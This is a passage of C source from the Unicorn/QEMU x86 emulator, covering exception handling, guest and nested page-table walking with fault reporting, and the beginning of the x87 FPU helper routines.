*/ static int check_exception(CPUX86State *env, int intno, int *error_code, uintptr_t retaddr) { int first_contributory = env->old_exception == 0 || (env->old_exception >= 10 && env->old_exception <= 13); int second_contributory = intno == 0 || (intno >= 10 && intno <= 13); qemu_log_mask(CPU_LOG_INT, "check_exception old: 0x%x new 0x%x\n", env->old_exception, intno); if (env->old_exception == EXCP08_DBLE) { if (env->hflags & HF_GUEST_MASK) { cpu_vmexit(env, SVM_EXIT_SHUTDOWN, 0, retaddr); /* does not return */ } qemu_log_mask(CPU_LOG_RESET, "Triple fault\n"); qemu_system_reset_request(env->uc); return EXCP_HLT; } if ((first_contributory && second_contributory) || (env->old_exception == EXCP0E_PAGE && (second_contributory || (intno == EXCP0E_PAGE)))) { intno = EXCP08_DBLE; *error_code = 0; } if (second_contributory || (intno == EXCP0E_PAGE) || (intno == EXCP08_DBLE)) { env->old_exception = intno; } return intno; } /* * Signal an interruption. It is executed in the main CPU loop. * is_int is TRUE if coming from the int instruction. next_eip is the * env->eip value AFTER the interrupt instruction. It is only relevant if * is_int is TRUE. */ static void QEMU_NORETURN raise_interrupt2(CPUX86State *env, int intno, int is_int, int error_code, int next_eip_addend, uintptr_t retaddr) { CPUState *cs = env_cpu(env); if (!is_int) { cpu_svm_check_intercept_param(env, SVM_EXIT_EXCP_BASE + intno, error_code, retaddr); intno = check_exception(env, intno, &error_code, retaddr); } else { cpu_svm_check_intercept_param(env, SVM_EXIT_SWINT, 0, retaddr); } cs->exception_index = intno; env->error_code = error_code; env->exception_is_int = is_int; env->exception_next_eip = env->eip + next_eip_addend; cpu_loop_exit_restore(cs, retaddr); } /* shortcuts to generate exceptions */ void QEMU_NORETURN raise_interrupt(CPUX86State *env, int intno, int is_int, int error_code, int next_eip_addend) { raise_interrupt2(env, intno, is_int, error_code, next_eip_addend, 0); } void raise_exception_err(CPUX86State *env, int exception_index, int error_code) { raise_interrupt2(env, exception_index, 0, error_code, 0, 0); } void raise_exception_err_ra(CPUX86State *env, int exception_index, int error_code, uintptr_t retaddr) { raise_interrupt2(env, exception_index, 0, error_code, 0, retaddr); } void raise_exception(CPUX86State *env, int exception_index) { raise_interrupt2(env, exception_index, 0, 0, 0, 0); } void raise_exception_ra(CPUX86State *env, int exception_index, uintptr_t retaddr) { raise_interrupt2(env, exception_index, 0, 0, 0, retaddr); } static hwaddr get_hphys(CPUState *cs, hwaddr gphys, MMUAccessType access_type, int *prot) { CPUX86State *env = &X86_CPU(cs)->env; uint64_t rsvd_mask = PG_HI_RSVD_MASK; uint64_t ptep, pte; uint64_t exit_info_1 = 0; target_ulong pde_addr, pte_addr; uint32_t page_offset; int page_size; if (likely(!(env->hflags2 & HF2_NPT_MASK))) { return gphys; } if (!(env->nested_pg_mode & SVM_NPT_NXE)) { rsvd_mask |= PG_NX_MASK; } if (env->nested_pg_mode & SVM_NPT_PAE) { uint64_t pde, pdpe; target_ulong pdpe_addr; #ifdef TARGET_X86_64 if (env->nested_pg_mode & SVM_NPT_LMA) { uint64_t pml5e; uint64_t pml4e_addr, pml4e; pml5e = env->nested_cr3; ptep = PG_NX_MASK | PG_USER_MASK | PG_RW_MASK; pml4e_addr = (pml5e & PG_ADDRESS_MASK) + (((gphys >> 39) & 0x1ff) << 3); pml4e = x86_ldq_phys(cs, pml4e_addr); if (!(pml4e & PG_PRESENT_MASK)) { goto do_fault; } if (pml4e & (rsvd_mask | PG_PSE_MASK)) { goto do_fault_rsvd; } if (!(pml4e & PG_ACCESSED_MASK)) { pml4e |= PG_ACCESSED_MASK; x86_stl_phys_notdirty(cs, pml4e_addr, 
pml4e); } ptep &= pml4e ^ PG_NX_MASK; pdpe_addr = (pml4e & PG_ADDRESS_MASK) + (((gphys >> 30) & 0x1ff) << 3); pdpe = x86_ldq_phys(cs, pdpe_addr); if (!(pdpe & PG_PRESENT_MASK)) { goto do_fault; } if (pdpe & rsvd_mask) { goto do_fault_rsvd; } ptep &= pdpe ^ PG_NX_MASK; if (!(pdpe & PG_ACCESSED_MASK)) { pdpe |= PG_ACCESSED_MASK; x86_stl_phys_notdirty(cs, pdpe_addr, pdpe); } if (pdpe & PG_PSE_MASK) { /* 1 GB page */ page_size = 1024 * 1024 * 1024; pte_addr = pdpe_addr; pte = pdpe; goto do_check_protect; } } else #endif { pdpe_addr = (env->nested_cr3 & ~0x1f) + ((gphys >> 27) & 0x18); pdpe = x86_ldq_phys(cs, pdpe_addr); if (!(pdpe & PG_PRESENT_MASK)) { goto do_fault; } rsvd_mask |= PG_HI_USER_MASK; if (pdpe & (rsvd_mask | PG_NX_MASK)) { goto do_fault_rsvd; } ptep = PG_NX_MASK | PG_USER_MASK | PG_RW_MASK; } pde_addr = (pdpe & PG_ADDRESS_MASK) + (((gphys >> 21) & 0x1ff) << 3); pde = x86_ldq_phys(cs, pde_addr); if (!(pde & PG_PRESENT_MASK)) { goto do_fault; } if (pde & rsvd_mask) { goto do_fault_rsvd; } ptep &= pde ^ PG_NX_MASK; if (pde & PG_PSE_MASK) { /* 2 MB page */ page_size = 2048 * 1024; pte_addr = pde_addr; pte = pde; goto do_check_protect; } /* 4 KB page */ if (!(pde & PG_ACCESSED_MASK)) { pde |= PG_ACCESSED_MASK; x86_stl_phys_notdirty(cs, pde_addr, pde); } pte_addr = (pde & PG_ADDRESS_MASK) + (((gphys >> 12) & 0x1ff) << 3); pte = x86_ldq_phys(cs, pte_addr); if (!(pte & PG_PRESENT_MASK)) { goto do_fault; } if (pte & rsvd_mask) { goto do_fault_rsvd; } /* combine pde and pte nx, user and rw protections */ ptep &= pte ^ PG_NX_MASK; page_size = 4096; } else { uint32_t pde; /* page directory entry */ pde_addr = (env->nested_cr3 & ~0xfff) + ((gphys >> 20) & 0xffc); pde = x86_ldl_phys(cs, pde_addr); if (!(pde & PG_PRESENT_MASK)) { goto do_fault; } ptep = pde | PG_NX_MASK; /* if PSE bit is set, then we use a 4MB page */ if ((pde & PG_PSE_MASK) && (env->cr[4] & CR4_PSE_MASK)) { page_size = 4096 * 1024; pte_addr = pde_addr; /* Bits 20-13 provide bits 39-32 of the address, bit 21 is reserved. * Leave bits 20-13 in place for setting accessed/dirty bits below. 
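The statement that follows implements the PSE-36 extension described in the comment: for a 4 MiB page, PDE bits 20:13 supply physical address bits 39:32, so shifting them left by (32 - 13) splices them into place. A stand-alone illustration with an invented PDE value:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    /* P + PS bits, frame base at 4 MiB, and PDE bit 13 set */
    uint64_t pde = 0x400000 | 0x2000 | 0x80 | 0x1;
    uint64_t pte = pde | ((pde & 0x1fe000ULL) << (32 - 13));

    printf("pde %#llx -> extended pte %#llx\n",
           (unsigned long long)pde, (unsigned long long)pte);
    printf("physical address bit 32 set: %d\n", (int)((pte >> 32) & 1));
    return 0;
}

Leaving bits 20:13 in place as well (an OR rather than a move) is deliberate: the accessed/dirty updates further down still want the original PDE layout.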
*/ pte = pde | ((pde & 0x1fe000LL) << (32 - 13)); rsvd_mask = 0x200000; goto do_check_protect_pse36; } if (!(pde & PG_ACCESSED_MASK)) { pde |= PG_ACCESSED_MASK; x86_stl_phys_notdirty(cs, pde_addr, pde); } /* page directory entry */ pte_addr = (pde & ~0xfff) + ((gphys >> 10) & 0xffc); pte = x86_ldl_phys(cs, pte_addr); if (!(pte & PG_PRESENT_MASK)) { goto do_fault; } /* combine pde and pte user and rw protections */ ptep &= pte | PG_NX_MASK; page_size = 4096; rsvd_mask = 0; } do_check_protect: rsvd_mask |= (page_size - 1) & PG_ADDRESS_MASK & ~PG_PSE_PAT_MASK; do_check_protect_pse36: if (pte & rsvd_mask) { goto do_fault_rsvd; } ptep ^= PG_NX_MASK; if (!(ptep & PG_USER_MASK)) { goto do_fault_protect; } if (ptep & PG_NX_MASK) { if (access_type == MMU_INST_FETCH) { goto do_fault_protect; } *prot &= ~PAGE_EXEC; } if (!(ptep & PG_RW_MASK)) { if (access_type == MMU_DATA_STORE) { goto do_fault_protect; } *prot &= ~PAGE_WRITE; } pte &= PG_ADDRESS_MASK & ~(page_size - 1); page_offset = gphys & (page_size - 1); return pte + page_offset; do_fault_rsvd: exit_info_1 |= SVM_NPTEXIT_RSVD; do_fault_protect: exit_info_1 |= SVM_NPTEXIT_P; do_fault: x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.exit_info_2), gphys); exit_info_1 |= SVM_NPTEXIT_US; if (access_type == MMU_DATA_STORE) { exit_info_1 |= SVM_NPTEXIT_RW; } else if (access_type == MMU_INST_FETCH) { exit_info_1 |= SVM_NPTEXIT_ID; } if (prot) { exit_info_1 |= SVM_NPTEXIT_GPA; } else { /* page table access */ exit_info_1 |= SVM_NPTEXIT_GPT; } cpu_vmexit(env, SVM_EXIT_NPF, exit_info_1, env->retaddr); } /* return value: * -1 = cannot handle fault * 0 = nothing more to do * 1 = generate PF fault */ static int handle_mmu_fault(CPUState *cs, vaddr addr, int size, int is_write1, int mmu_idx) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; uint64_t ptep, pte; int32_t a20_mask; target_ulong pde_addr, pte_addr; int error_code = 0; int is_dirty, prot, page_size, is_write, is_user; hwaddr paddr; uint64_t rsvd_mask = PG_HI_RSVD_MASK; uint32_t page_offset; target_ulong vaddr; is_user = mmu_idx == MMU_USER_IDX; #if defined(DEBUG_MMU) printf("MMU fault: addr=%" VADDR_PRIx " w=%d u=%d eip=" TARGET_FMT_lx "\n", addr, is_write1, is_user, env->eip); #endif is_write = is_write1 & 1; a20_mask = x86_get_a20_mask(env); if (!(env->cr[0] & CR0_PG_MASK)) { pte = addr; #ifdef TARGET_X86_64 if (!(env->hflags & HF_LMA_MASK)) { /* Without long mode we can only address 32bits in real mode */ pte = (uint32_t)pte; } #endif prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; page_size = 4096; goto do_mapping; } if (!(env->efer & MSR_EFER_NXE)) { rsvd_mask |= PG_NX_MASK; } if (env->cr[4] & CR4_PAE_MASK) { uint64_t pde, pdpe; target_ulong pdpe_addr; #ifdef TARGET_X86_64 if (env->hflags & HF_LMA_MASK) { bool la57 = env->cr[4] & CR4_LA57_MASK; uint64_t pml5e_addr, pml5e; uint64_t pml4e_addr, pml4e; int32_t sext; /* test virtual address sign extension */ sext = la57 ? 
(int64_t)addr >> 56 : (int64_t)addr >> 47; if (sext != 0 && sext != -1) { env->error_code = 0; cs->exception_index = EXCP0D_GPF; return 1; } if (la57) { pml5e_addr = ((env->cr[3] & ~0xfff) + (((addr >> 48) & 0x1ff) << 3)) & a20_mask; pml5e_addr = get_hphys(cs, pml5e_addr, MMU_DATA_STORE, NULL); pml5e = x86_ldq_phys(cs, pml5e_addr); if (!(pml5e & PG_PRESENT_MASK)) { goto do_fault; } if (pml5e & (rsvd_mask | PG_PSE_MASK)) { goto do_fault_rsvd; } if (!(pml5e & PG_ACCESSED_MASK)) { pml5e |= PG_ACCESSED_MASK; x86_stl_phys_notdirty(cs, pml5e_addr, pml5e); } ptep = pml5e ^ PG_NX_MASK; } else { pml5e = env->cr[3]; ptep = PG_NX_MASK | PG_USER_MASK | PG_RW_MASK; } pml4e_addr = ((pml5e & PG_ADDRESS_MASK) + (((addr >> 39) & 0x1ff) << 3)) & a20_mask; pml4e_addr = get_hphys(cs, pml4e_addr, MMU_DATA_STORE, false); pml4e = x86_ldq_phys(cs, pml4e_addr); if (!(pml4e & PG_PRESENT_MASK)) { goto do_fault; } if (pml4e & (rsvd_mask | PG_PSE_MASK)) { goto do_fault_rsvd; } if (!(pml4e & PG_ACCESSED_MASK)) { pml4e |= PG_ACCESSED_MASK; x86_stl_phys_notdirty(cs, pml4e_addr, pml4e); } ptep &= pml4e ^ PG_NX_MASK; pdpe_addr = ((pml4e & PG_ADDRESS_MASK) + (((addr >> 30) & 0x1ff) << 3)) & a20_mask; pdpe_addr = get_hphys(cs, pdpe_addr, MMU_DATA_STORE, NULL); pdpe = x86_ldq_phys(cs, pdpe_addr); if (!(pdpe & PG_PRESENT_MASK)) { goto do_fault; } if (pdpe & rsvd_mask) { goto do_fault_rsvd; } ptep &= pdpe ^ PG_NX_MASK; if (!(pdpe & PG_ACCESSED_MASK)) { pdpe |= PG_ACCESSED_MASK; x86_stl_phys_notdirty(cs, pdpe_addr, pdpe); } if (pdpe & PG_PSE_MASK) { /* 1 GB page */ page_size = 1024 * 1024 * 1024; pte_addr = pdpe_addr; pte = pdpe; goto do_check_protect; } } else #endif { /* XXX: load them when cr3 is loaded ? */ pdpe_addr = ((env->cr[3] & ~0x1f) + ((addr >> 27) & 0x18)) & a20_mask; pdpe_addr = get_hphys(cs, pdpe_addr, MMU_DATA_STORE, false); pdpe = x86_ldq_phys(cs, pdpe_addr); if (!(pdpe & PG_PRESENT_MASK)) { goto do_fault; } rsvd_mask |= PG_HI_USER_MASK; if (pdpe & (rsvd_mask | PG_NX_MASK)) { goto do_fault_rsvd; } ptep = PG_NX_MASK | PG_USER_MASK | PG_RW_MASK; } pde_addr = ((pdpe & PG_ADDRESS_MASK) + (((addr >> 21) & 0x1ff) << 3)) & a20_mask; pde_addr = get_hphys(cs, pde_addr, MMU_DATA_STORE, NULL); pde = x86_ldq_phys(cs, pde_addr); if (!(pde & PG_PRESENT_MASK)) { goto do_fault; } if (pde & rsvd_mask) { goto do_fault_rsvd; } ptep &= pde ^ PG_NX_MASK; if (pde & PG_PSE_MASK) { /* 2 MB page */ page_size = 2048 * 1024; pte_addr = pde_addr; pte = pde; goto do_check_protect; } /* 4 KB page */ if (!(pde & PG_ACCESSED_MASK)) { pde |= PG_ACCESSED_MASK; x86_stl_phys_notdirty(cs, pde_addr, pde); } pte_addr = ((pde & PG_ADDRESS_MASK) + (((addr >> 12) & 0x1ff) << 3)) & a20_mask; pte_addr = get_hphys(cs, pte_addr, MMU_DATA_STORE, NULL); pte = x86_ldq_phys(cs, pte_addr); if (!(pte & PG_PRESENT_MASK)) { goto do_fault; } if (pte & rsvd_mask) { goto do_fault_rsvd; } /* combine pde and pte nx, user and rw protections */ ptep &= pte ^ PG_NX_MASK; page_size = 4096; } else { uint32_t pde; /* page directory entry */ pde_addr = ((env->cr[3] & ~0xfff) + ((addr >> 20) & 0xffc)) & a20_mask; pde_addr = get_hphys(cs, pde_addr, MMU_DATA_STORE, NULL); pde = x86_ldl_phys(cs, pde_addr); if (!(pde & PG_PRESENT_MASK)) { goto do_fault; } ptep = pde | PG_NX_MASK; /* if PSE bit is set, then we use a 4MB page */ if ((pde & PG_PSE_MASK) && (env->cr[4] & CR4_PSE_MASK)) { page_size = 4096 * 1024; pte_addr = pde_addr; /* Bits 20-13 provide bits 39-32 of the address, bit 21 is reserved. * Leave bits 20-13 in place for setting accessed/dirty bits below. 
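One step of this walk that deserves a stand-alone restatement is the sign-extension test near its top (the la57 ternary): an address is canonical exactly when discarding the low 47 bits (56 with LA57) leaves all zeros or all ones. is_canonical() is an invented name; the widths and probe addresses are standard x86-64 values.

#include <stdio.h>
#include <stdint.h>

static int is_canonical(uint64_t va, int la57)
{
    int64_t sext = la57 ? (int64_t)va >> 56 : (int64_t)va >> 47;
    return sext == 0 || sext == -1;
}

int main(void)
{
    printf("%d\n", is_canonical(0x00007fffffffffffULL, 0)); /* 1: top of low half */
    printf("%d\n", is_canonical(0xffff800000000000ULL, 0)); /* 1: base of high half */
    printf("%d\n", is_canonical(0x0000800000000000ULL, 0)); /* 0: inside the hole */
    printf("%d\n", is_canonical(0x0000800000000000ULL, 1)); /* 1: canonical under LA57 */
    return 0;
}

A non-canonical address makes handle_mmu_fault() raise #GP rather than #PF, matching hardware.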
*/ pte = pde | ((pde & 0x1fe000LL) << (32 - 13)); rsvd_mask = 0x200000; goto do_check_protect_pse36; } if (!(pde & PG_ACCESSED_MASK)) { pde |= PG_ACCESSED_MASK; x86_stl_phys_notdirty(cs, pde_addr, pde); } /* page directory entry */ pte_addr = ((pde & ~0xfff) + ((addr >> 10) & 0xffc)) & a20_mask; pte_addr = get_hphys(cs, pte_addr, MMU_DATA_STORE, NULL); pte = x86_ldl_phys(cs, pte_addr); if (!(pte & PG_PRESENT_MASK)) { goto do_fault; } /* combine pde and pte user and rw protections */ ptep &= pte | PG_NX_MASK; page_size = 4096; rsvd_mask = 0; } do_check_protect: rsvd_mask |= (page_size - 1) & PG_ADDRESS_MASK & ~PG_PSE_PAT_MASK; do_check_protect_pse36: if (pte & rsvd_mask) { goto do_fault_rsvd; } ptep ^= PG_NX_MASK; /* can the page can be put in the TLB? prot will tell us */ if (is_user && !(ptep & PG_USER_MASK)) { goto do_fault_protect; } prot = 0; if (mmu_idx != MMU_KSMAP_IDX || !(ptep & PG_USER_MASK)) { prot |= PAGE_READ; if ((ptep & PG_RW_MASK) || (!is_user && !(env->cr[0] & CR0_WP_MASK))) { prot |= PAGE_WRITE; } } if (!(ptep & PG_NX_MASK) && (mmu_idx == MMU_USER_IDX || !((env->cr[4] & CR4_SMEP_MASK) && (ptep & PG_USER_MASK)))) { prot |= PAGE_EXEC; } if ((env->cr[4] & CR4_PKE_MASK) && (env->hflags & HF_LMA_MASK) && (ptep & PG_USER_MASK) && env->pkru) { uint32_t pk = (pte & PG_PKRU_MASK) >> PG_PKRU_BIT; uint32_t pkru_ad = (env->pkru >> pk * 2) & 1; uint32_t pkru_wd = (env->pkru >> pk * 2) & 2; uint32_t pkru_prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; if (pkru_ad) { pkru_prot &= ~(PAGE_READ | PAGE_WRITE); } else if (pkru_wd && (is_user || env->cr[0] & CR0_WP_MASK)) { pkru_prot &= ~PAGE_WRITE; } prot &= pkru_prot; if ((pkru_prot & (1 << is_write1)) == 0) { assert(is_write1 != 2); error_code |= PG_ERROR_PK_MASK; goto do_fault_protect; } } if ((prot & (1 << is_write1)) == 0) { goto do_fault_protect; } /* yes, it can! */ is_dirty = is_write && !(pte & PG_DIRTY_MASK); if (!(pte & PG_ACCESSED_MASK) || is_dirty) { pte |= PG_ACCESSED_MASK; if (is_dirty) { pte |= PG_DIRTY_MASK; } x86_stl_phys_notdirty(cs, pte_addr, pte); } if (!(pte & PG_DIRTY_MASK)) { /* only set write access if already dirty... 
otherwise wait for dirty access */
        assert(!is_write);
        prot &= ~PAGE_WRITE;
    }

do_mapping:
    pte = pte & a20_mask;

    /* align to page_size */
    pte &= PG_ADDRESS_MASK & ~(page_size - 1);
    page_offset = addr & (page_size - 1);
    paddr = get_hphys(cs, pte + page_offset, is_write1, &prot);

    /* Even with 4 MB pages, we map only one 4 KB page in the TLB to
       avoid filling it too fast */
    vaddr = addr & TARGET_PAGE_MASK;
    paddr &= TARGET_PAGE_MASK;
    assert(prot & (1 << is_write1));
    tlb_set_page_with_attrs(cs, vaddr, paddr, cpu_get_mem_attrs(env),
                            prot, mmu_idx, page_size);
    return 0;

do_fault_rsvd:
    error_code |= PG_ERROR_RSVD_MASK;
do_fault_protect:
    error_code |= PG_ERROR_P_MASK;
do_fault:
    error_code |= (is_write << PG_ERROR_W_BIT);
    if (is_user)
        error_code |= PG_ERROR_U_MASK;
    if (is_write1 == 2 &&
        (((env->efer & MSR_EFER_NXE) && (env->cr[4] & CR4_PAE_MASK)) ||
         (env->cr[4] & CR4_SMEP_MASK)))
        error_code |= PG_ERROR_I_D_MASK;
    if (env->intercept_exceptions & (1 << EXCP0E_PAGE)) {
        /* cr2 is not modified in case of exceptions */
        x86_stq_phys(cs,
                     env->vm_vmcb + offsetof(struct vmcb, control.exit_info_2),
                     addr);
    } else {
        env->cr[2] = addr;
    }
    env->error_code = error_code;
    cs->exception_index = EXCP0E_PAGE;
    return 1;
}

bool x86_cpu_tlb_fill(CPUState *cs, vaddr addr, int size,
                      MMUAccessType access_type, int mmu_idx,
                      bool probe, uintptr_t retaddr)
{
    X86CPU *cpu = X86_CPU(cs);
    CPUX86State *env = &cpu->env;

    env->retaddr = retaddr;
    if (handle_mmu_fault(cs, addr, size, access_type, mmu_idx)) {
        /* FIXME: On error in get_hphys we have already jumped out. */
        g_assert(!probe);
        raise_exception_err_ra(env, cs->exception_index,
                               env->error_code, retaddr);
    }
    return true;
}

unicorn-2.1.1/qemu/target/i386/fpu_helper.c

/*
 * x86 FPU, MMX/3DNow!/SSE/SSE2/SSE3/SSSE3/SSE4/PNI helpers
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ #include "qemu/osdep.h" #include <math.h> #include "cpu.h" #include "exec/helper-proto.h" #include "qemu/host-utils.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "fpu/softfloat.h" #define FPU_RC_MASK 0xc00 #define FPU_RC_NEAR 0x000 #define FPU_RC_DOWN 0x400 #define FPU_RC_UP 0x800 #define FPU_RC_CHOP 0xc00 #define MAXTAN 9223372036854775808.0 /* the following deal with x86 long double-precision numbers */ #define MAXEXPD 0x7fff #define EXPBIAS 16383 #define EXPD(fp) (fp.l.upper & 0x7fff) #define SIGND(fp) ((fp.l.upper) & 0x8000) #define MANTD(fp) (fp.l.lower) #define BIASEXPONENT(fp) fp.l.upper = (fp.l.upper & ~(0x7fff)) | EXPBIAS #define FPUS_IE (1 << 0) #define FPUS_DE (1 << 1) #define FPUS_ZE (1 << 2) #define FPUS_OE (1 << 3) #define FPUS_UE (1 << 4) #define FPUS_PE (1 << 5) #define FPUS_SF (1 << 6) #define FPUS_SE (1 << 7) #define FPUS_B (1 << 15) #define FPUC_EM 0x3f #define floatx80_lg2 make_floatx80(0x3ffd, 0x9a209a84fbcff799LL) #define floatx80_l2e make_floatx80(0x3fff, 0xb8aa3b295c17f0bcLL) #define floatx80_l2t make_floatx80(0x4000, 0xd49a784bcd1b8afeLL) static void cpu_clear_ignne(CPUX86State *env) { env->hflags2 &= ~HF2_IGNNE_MASK; } void cpu_set_ignne(CPUX86State *env) { env->hflags2 |= HF2_IGNNE_MASK; /* * We get here in response to a write to port F0h. The chipset should * deassert FP_IRQ and FERR# instead should stay signaled until FPSW_SE is * cleared, because FERR# and FP_IRQ are two separate pins on real * hardware. However, we don't model FERR# as a qemu_irq, so we just * do directly what the chipset would do, i.e. deassert FP_IRQ. */ // qemu_irq_lower(ferr_irq); } static inline void fpush(CPUX86State *env) { env->fpstt = (env->fpstt - 1) & 7; env->fptags[env->fpstt] = 0; /* validate stack entry */ } static inline void fpop(CPUX86State *env) { env->fptags[env->fpstt] = 1; /* invalidate stack entry */ env->fpstt = (env->fpstt + 1) & 7; } static inline floatx80 helper_fldt(CPUX86State *env, target_ulong ptr, uintptr_t retaddr) { CPU_LDoubleU temp; temp.l.lower = cpu_ldq_data_ra(env, ptr, retaddr); temp.l.upper = cpu_lduw_data_ra(env, ptr + 8, retaddr); return temp.d; } static inline void helper_fstt(CPUX86State *env, floatx80 f, target_ulong ptr, uintptr_t retaddr) { CPU_LDoubleU temp; temp.d = f; cpu_stq_data_ra(env, ptr, temp.l.lower, retaddr); cpu_stw_data_ra(env, ptr + 8, temp.l.upper, retaddr); } /* x87 FPU helpers */ static inline double floatx80_to_double(CPUX86State *env, floatx80 a) { union { float64 f64; double d; } u; u.f64 = floatx80_to_float64(a, &env->fp_status); return u.d; } static inline floatx80 double_to_floatx80(CPUX86State *env, double a) { union { float64 f64; double d; } u; u.d = a; return float64_to_floatx80(u.f64, &env->fp_status); } static void fpu_set_exception(CPUX86State *env, int mask) { env->fpus |= mask; if (env->fpus & (~env->fpuc & FPUC_EM)) { env->fpus |= FPUS_SE | FPUS_B; } } static inline floatx80 helper_fdiv(CPUX86State *env, floatx80 a, floatx80 b) { if (floatx80_is_zero(b)) { fpu_set_exception(env, FPUS_ZE); } return floatx80_div(a, b, &env->fp_status); } static void fpu_raise_exception(CPUX86State *env, uintptr_t retaddr) { if (env->cr[0] & CR0_NE_MASK) { raise_exception_ra(env, EXCP10_COPR, retaddr); } } void helper_flds_FT0(CPUX86State *env, uint32_t val) { union { float32 f; uint32_t i; } u; u.i = val; FT0 = float32_to_floatx80(u.f, &env->fp_status); } void helper_fldl_FT0(CPUX86State *env, uint64_t val) { union { float64 f; uint64_t i; } u; u.i = val; FT0 = float64_to_floatx80(u.f, &env->fp_status); } void 
helper_fildl_FT0(CPUX86State *env, int32_t val) { FT0 = int32_to_floatx80(val, &env->fp_status); } void helper_flds_ST0(CPUX86State *env, uint32_t val) { int new_fpstt; union { float32 f; uint32_t i; } u; new_fpstt = (env->fpstt - 1) & 7; u.i = val; env->fpregs[new_fpstt].d = float32_to_floatx80(u.f, &env->fp_status); env->fpstt = new_fpstt; env->fptags[new_fpstt] = 0; /* validate stack entry */ } void helper_fldl_ST0(CPUX86State *env, uint64_t val) { int new_fpstt; union { float64 f; uint64_t i; } u; new_fpstt = (env->fpstt - 1) & 7; u.i = val; env->fpregs[new_fpstt].d = float64_to_floatx80(u.f, &env->fp_status); env->fpstt = new_fpstt; env->fptags[new_fpstt] = 0; /* validate stack entry */ } void helper_fildl_ST0(CPUX86State *env, int32_t val) { int new_fpstt; new_fpstt = (env->fpstt - 1) & 7; env->fpregs[new_fpstt].d = int32_to_floatx80(val, &env->fp_status); env->fpstt = new_fpstt; env->fptags[new_fpstt] = 0; /* validate stack entry */ } void helper_fildll_ST0(CPUX86State *env, int64_t val) { int new_fpstt; new_fpstt = (env->fpstt - 1) & 7; env->fpregs[new_fpstt].d = int64_to_floatx80(val, &env->fp_status); env->fpstt = new_fpstt; env->fptags[new_fpstt] = 0; /* validate stack entry */ } uint32_t helper_fsts_ST0(CPUX86State *env) { union { float32 f; uint32_t i; } u; u.f = floatx80_to_float32(ST0, &env->fp_status); return u.i; } uint64_t helper_fstl_ST0(CPUX86State *env) { union { float64 f; uint64_t i; } u; u.f = floatx80_to_float64(ST0, &env->fp_status); return u.i; } int32_t helper_fist_ST0(CPUX86State *env) { int32_t val; val = floatx80_to_int32(ST0, &env->fp_status); if (val != (int16_t)val) { val = -32768; } return val; } int32_t helper_fistl_ST0(CPUX86State *env) { int32_t val; signed char old_exp_flags; old_exp_flags = get_float_exception_flags(&env->fp_status); set_float_exception_flags(0, &env->fp_status); val = floatx80_to_int32(ST0, &env->fp_status); if (get_float_exception_flags(&env->fp_status) & float_flag_invalid) { val = 0x80000000; } set_float_exception_flags(get_float_exception_flags(&env->fp_status) | old_exp_flags, &env->fp_status); return val; } int64_t helper_fistll_ST0(CPUX86State *env) { int64_t val; signed char old_exp_flags; old_exp_flags = get_float_exception_flags(&env->fp_status); set_float_exception_flags(0, &env->fp_status); val = floatx80_to_int64(ST0, &env->fp_status); if (get_float_exception_flags(&env->fp_status) & float_flag_invalid) { val = 0x8000000000000000ULL; } set_float_exception_flags(get_float_exception_flags(&env->fp_status) | old_exp_flags, &env->fp_status); return val; } int32_t helper_fistt_ST0(CPUX86State *env) { int32_t val; val = floatx80_to_int32_round_to_zero(ST0, &env->fp_status); if (val != (int16_t)val) { val = -32768; } return val; } int32_t helper_fisttl_ST0(CPUX86State *env) { return floatx80_to_int32_round_to_zero(ST0, &env->fp_status); } int64_t helper_fisttll_ST0(CPUX86State *env) { return floatx80_to_int64_round_to_zero(ST0, &env->fp_status); } void helper_fldt_ST0(CPUX86State *env, target_ulong ptr) { int new_fpstt; new_fpstt = (env->fpstt - 1) & 7; env->fpregs[new_fpstt].d = helper_fldt(env, ptr, GETPC()); env->fpstt = new_fpstt; env->fptags[new_fpstt] = 0; /* validate stack entry */ } void helper_fstt_ST0(CPUX86State *env, target_ulong ptr) { helper_fstt(env, ST0, ptr, GETPC()); } void helper_fpush(CPUX86State *env) { fpush(env); } void helper_fpop(CPUX86State *env) { fpop(env); } void helper_fdecstp(CPUX86State *env) { env->fpstt = (env->fpstt - 1) & 7; env->fpus &= ~0x4700; } void helper_fincstp(CPUX86State *env) { 
env->fpstt = (env->fpstt + 1) & 7; env->fpus &= ~0x4700; } /* FPU move */ void helper_ffree_STN(CPUX86State *env, int st_index) { env->fptags[(env->fpstt + st_index) & 7] = 1; } void helper_fmov_ST0_FT0(CPUX86State *env) { ST0 = FT0; } void helper_fmov_FT0_STN(CPUX86State *env, int st_index) { FT0 = ST(st_index); } void helper_fmov_ST0_STN(CPUX86State *env, int st_index) { ST0 = ST(st_index); } void helper_fmov_STN_ST0(CPUX86State *env, int st_index) { ST(st_index) = ST0; } void helper_fxchg_ST0_STN(CPUX86State *env, int st_index) { floatx80 tmp; tmp = ST(st_index); ST(st_index) = ST0; ST0 = tmp; } /* FPU operations */ static const int fcom_ccval[4] = {0x0100, 0x4000, 0x0000, 0x4500}; void helper_fcom_ST0_FT0(CPUX86State *env) { int ret; ret = floatx80_compare(ST0, FT0, &env->fp_status); env->fpus = (env->fpus & ~0x4500) | fcom_ccval[ret + 1]; } void helper_fucom_ST0_FT0(CPUX86State *env) { int ret; ret = floatx80_compare_quiet(ST0, FT0, &env->fp_status); env->fpus = (env->fpus & ~0x4500) | fcom_ccval[ret + 1]; } static const int fcomi_ccval[4] = {CC_C, CC_Z, 0, CC_Z | CC_P | CC_C}; void helper_fcomi_ST0_FT0(CPUX86State *env) { int eflags; int ret; ret = floatx80_compare(ST0, FT0, &env->fp_status); eflags = cpu_cc_compute_all(env, CC_OP); eflags = (eflags & ~(CC_Z | CC_P | CC_C)) | fcomi_ccval[ret + 1]; CC_SRC = eflags; } void 